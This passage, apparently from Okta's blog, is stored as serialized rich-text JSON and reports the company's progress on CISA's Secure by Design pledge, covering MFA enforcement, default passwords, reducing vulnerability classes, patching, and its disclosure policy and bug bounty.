vulnerabilities\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Completed\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Deliver improved logging and monitoring for customers\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In Progress\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While technically at the midway point of the exercise, I want to stress that Okta’s commitment to security best practices does not end when the one-year mark is up in May 2025. Okta is engaged in a long-term initiative to lead the industry in the fight against Identity-based attacks - what we call the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/au/secure-identity-commitment/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Secure Identity Commitment\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"On that basis, we would not be opposed to CISA expanding its list of goals and making “Secure by Design” a multi-year program. 
At Okta, we have \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2024/10/oktas-mission-to-standardize-identity-security/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"big ideas\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" about the security features enterprise applications will need to have in place to handle emerging threats via IPSIE, a new open standard for identity in the enterprise. We stand ready to engage with CISA and our industry partners to shape a more resilient and secure future for cloud services.  \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"R2QhsAJt5os9D5f5gh37A\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"hr\",\"data\":{},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1. Drive Adoption of Multi-Factor Authentication\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\\\"Within one year of signing the pledge, demonstrate actions taken to measurably\\nincrease the use of multi-factor authentication across the manufacturer’s products.\\\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Current State\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Multifactor authentication is proven to be one of the most cost-effective and universally applicable security controls. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta boasts a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.itnews.com.au/news/mfa-took-off-in-the-covid-era-okta-says-596916\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"best-in-class record\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for adoption of multi-factor authentication among both users and administrators of the Workforce Identity Cloud. We publish statistics about MFA adoption, use, and performance via the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/sites/default/files/2024-10/Secure%20Sign-in%20Trends%20Report%202024.pdf\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Secure Sign-In Trends\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" report. This report records the relative growth and decline in total MFA use and the use of specific authenticators. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As of January 2024, 91 percent of administrators and 66 percent of users of Okta Workforce Identity signed in to an application using multifactor authentication. This represents close to a doubling of MFA usage since the months prior to the COVID-19 pandemic.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The passwordless, phishing-resistant sign-in methods supported in Okta Workforce Identity (Okta FastPass and FIDO2 WebAuthn) recorded the fastest growth as of January 2024. The growth of Okta FastPass was most impressive: this passwordless method climbed from 2% of users by the end of 2022 to 6.4 percent of users (and 13% of administrative users) in January 2024. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"There are several reasons Okta has historically outperformed the industry in terms of voluntary MFA adoption:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has made MFA accessible to all users:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Several sign-in methods (Okta Verify OTP and Okta FastPass) are available to all customers in the latest version of the Okta Workforce platform, Okta Identity Engine, released in 2022. These MFA methods are available to customers for use as a second factor irrespective of whether a customer is licensed for the Okta MFA solution.\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta is driving adoption of passwordless factors: \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Identity Engine is a policy engine that allows for password-optional authentication flows for secure access to workforce applications. 
This frees up organizations to optionally phase out the use of passwords for designated user populations on modern devices.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Since February 2024, FIDO2 passkeys have been a first-class factor in the Auth0 platform, providing customers an ability to offer a new primary authenticator to replace passwords in consumer-facing apps and websites.\",\"marks\":[],\"data\":{}}]}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Over the past 18 months, Okta has made several commitments that drive strong MFA adoption: \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/08/byo-telephony-and-future-sms-okta\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"no longer offers SMS as a default MFA method\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in new Okta Platform tenants, in an effort to encourage customers to embrace stronger sign-in flows.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta no longer allows administrators to create single-factor authentication policies for access to the Okta Admin Console or Auth0 Management Console. 
\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Customer administrators now require MFA for access to the Okta Help Center, a service desk/support application for the Okta Platform.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Target State\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s goal is to enforce MFA for all administrative access to internet-facing services within the term of the Secure by Design pledge. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The MFA enforcement program for the Okta Admin Console commenced in September 2024 and is scheduled for completion by March 2025. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This program is complex and staged to support the different mechanisms Okta customers use to access privileged accounts, including the use of federated identity providers and privileged access management 
solutions.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-header-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Date\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-header-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enforcement\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"August 2024 \\n*\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Complete*\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Administrators can no longer create single-factor authentication policies for access to the Okta Admin Console, and have been notified of schedule for MFA enforcement.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"September 2024\\n\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"*Complete*\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"MFA required for access to the Okta Admin Console on production tenants.\\n\\nTemporary exemptions for tenants that: (a) do not allow inline MFA enrolment, (b) Use inbound federation or (c) Use PAM solutions to access the Okta Admin 
Console\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"November 2024\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"MFA required for access to the Okta Admin Console on production tenants, removing exemptions for tenants that do not allow inline MFA enrolment.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"January 2025\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"MFA required for access to the Okta Admin Console in developer tenants used for building third-party integrations.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"March 2025\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"MFA required for all access to the Okta Admin Console, using AMR claims mapping to account for federated use cases and PAM solutions.\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s longer term goal is to drive adoption of passwordless, phishing-resistant authentication for all administrative access. 
This method of sign-in dramatically reduces exposure to the most common forms of identity-based attacks. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Current initiatives include:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In-app notifications that nudge administrators signed in to the Okta Admin Console to enrol in phishing resistant factors.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Dashboards in the Admin Console that help customers track adoption of phishing resistant authentication. \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Updates to the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/resources/whitepaper-the-secure-sign-in-trends-report/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Secure SignIn Trends report\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", which tracks the rate of phishing resistant adoption for administrators and end users.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Our other major initiative is the launch of additional features that extend phishing resistance across the user lifecycle, from enrolment through to authentication and recovery. 
These include \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/authenticators/onboard-with-preenrolled-yubikey.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"pre-enrolled FIDO2 security keys\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to secure user onboarding as well as \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/idp-idv.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Identity Verification integrations\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that can be used to verify user identities using government-issued documents. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"2. Reduce the use of default passwords\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within one year of signing the pledge, demonstrate measurable progress towards\\nreducing default passwords across the manufacturers’ products.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Current State\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Default passwords present avoidable security risks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All secrets generated in Okta cloud services are randomly generated. 
This includes customer tenant encryption keys, client secrets or JWK key pairs for application integrations, temporary user passwords and API keys.  \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Where on-premise appliances, clients or agents require default credentials at installation, Okta enforces rotation of these credentials at first sign-in to the administrative console. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Target State\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"There are no immediate changes required.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"3. Reduce common classes of vulnerabilities\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within one year of signing the pledge, demonstrate actions taken towards enabling a significant measurable reduction in the prevalence of one or more vulnerability classes across the manufacturer’s products.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Current State\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s Product Security team performs security testing on all Okta products and triages vulnerability reports submitted by third parties.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In the interests of continual improvement, the team conducts large-scale studies of vulnerabilities reported across the Workforce and Customer Identity Clouds. 
Our latest study normalized this data against the Bugcrowd \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://bugcrowd.com/vulnerability-rating-taxonomy\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Vulnerability Rating Taxonomy (VRT)\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to generate trending metrics on critical and high vulnerabilities reported over time.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Okta Product Security team uses the output from this analysis to make decisions about the tools, processes and campaigns required to address the most common root causes of vulnerabilities. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Okta Security Education capability within this team uses the findings, for example, to develop focus areas in training and awareness campaigns. The Okta Security Reviews team, meanwhile, are intermittently tasked with a “deep review” of a recurring bug class and make recommendations on how to prevent its occurrence across large numbers of development teams. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This feedback loop has resulted in near eradication of a number of classes of vulnerabilities in Okta products. One example is \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://owasp.org/www-community/attacks/Server_Side_Request_Forgery\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Server Side Request Forgery\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". After multiple deep reviews, Okta’s Security Engineering function re-wrote an SSRF protection mechanism in 2020. 
Over the three years since, the number of SSRF bugs discovered has declined by an annual average of 47%. We have not (knock on wood) discovered or responded to any SSRF bugs in the Workforce Identity Cloud in 2024.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Target State\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Security now hopes to repeat this success with other vulnerabilities in the same category. Okta Product Security plans to initiate a campaign to drive down exposure to all vulnerabilities classed as Server Security Misconfigurations in the Bugcrowd VRT. The Server Security Misconfigurations category refers to 70+ vulnerability types. Many are troublesome because they tend to be difficult to discover or test for. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We are currently in the planning phase, which will result in a target metric, development of a dashboard, and a range of actions, such as:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Standardizing vulnerability categorization across product units, \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Deep Reviews to discover any additional evidence of this vulnerability across Okta’s product portfolio,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Updating Okta’s Secure Coding Guidelines to focus on this class of 
vulnerability,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Education campaigns and champions program initiatives that target specific engineering teams,  \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Hunting for repetitive patterns that could be automatically detected using scanners, and\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Development and advocacy for preferred libraries or recommended “secure by default” values.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We will provide an update on our results at the end of year one of the pledge.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"4. Drive improved customer patching hygiene\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within one year of signing the pledge, demonstrate actions taken to measurably\\nincrease the installation of security patches by customers.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Current State\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta is committed to making it easy for customers to maintain up-to-date versions of client software, where it is required. We facilitate and encourage the ability for customers to automatically update client software without human intervention. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Workforce Identity Cloud customers can configure automatic installation of updates for Active Directory Agents and LDAP Agents that synchronize with on-premise identity services. The Okta Verify client on Windows can also be configured for automatic updates. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Automatic updates remain optional, as many enterprise organizations prefer to test updates before they are applied in production. We offer customers the option of \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/devices/ov-autoupdate-windows.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"deferring or disabling automatic Okta Verify updates\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Even in cases where customers have chosen to defer or disable automatic updates of clients, Okta notifies customers where a version of a client they are running is found to be vulnerable to a new attack. Okta registers vulnerability information with the national vulnerability database as a CVE and proactively identifies and contacts potentially impacted customers.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators can check whether they are running the latest version of any given agent via notifications in the Admin Console. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Okta Verify client can be configured by administrators to automatically update on Android, iOS or MacOS using solutions from Okta’s \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/devices/managed-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Device Management partners\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". Users can auto-update the Okta Verify client or the Auth0 Guardian client downloaded from the Apple or Google app stores. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Target State\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta is committed to delivering automatic updates on supported platforms. Our next goal is to ensure that no customer is left behind due to a lack of information or context about what software needs to be updated. We are exploring ways to elevate reminders about pending updates to more prominent positions in our administrative consoles - such as creating new task list items or “inbox” notifications.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"5. 
Publish a Vulnerability Disclosure Policy\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within one year of signing the pledge, publish a vulnerability disclosure policy (VDP) that authorizes testing by members of the public on products offered by the manufacturer, commits to not recommending or pursuing legal action against anyone engaging in good faith efforts to follow the VDP, provides a clear channel to report vulnerabilities, and allows for public disclosure of vulnerabilities in line with coordinated vulnerability disclosure best practices and international standards. \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Current State\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta is committed to providing opportunities for independent security researchers, customer red teams and other interested parties to discover and responsibly disclose vulnerabilities in our platforms.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has a long-standing \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/vulnerability-reporting-policy\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"published Vulnerability Disclosure Policy\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and has maintained public bug bounty programs since 2016. 
Today Okta’s public bug bounty program includes the Auth0 platform, and most products in the Okta platform (including Okta Privileged Access, Okta Workflows, Okta Access Requests, Okta Device Access, Advanced Server Access, the Okta support portal as well as client software including Okta Verify clients, Okta directory agents and the Okta browser plugin). \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has provided financial rewards for over 400 issues submitted to the public bug bounty program since its inception, and paid out over US$440,000 in rewards.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Target State\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta aims to maintain 100% coverage of all Okta products in our bug bounty programs. To achieve this goal, Okta recently added Okta Access Gateway and Okta Personal to a private bug bounty program, and promoted the Auth0 Platform from the private program into Okta’s public bug bounty program. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta is committed to adding new products to these bug bounty programs into the 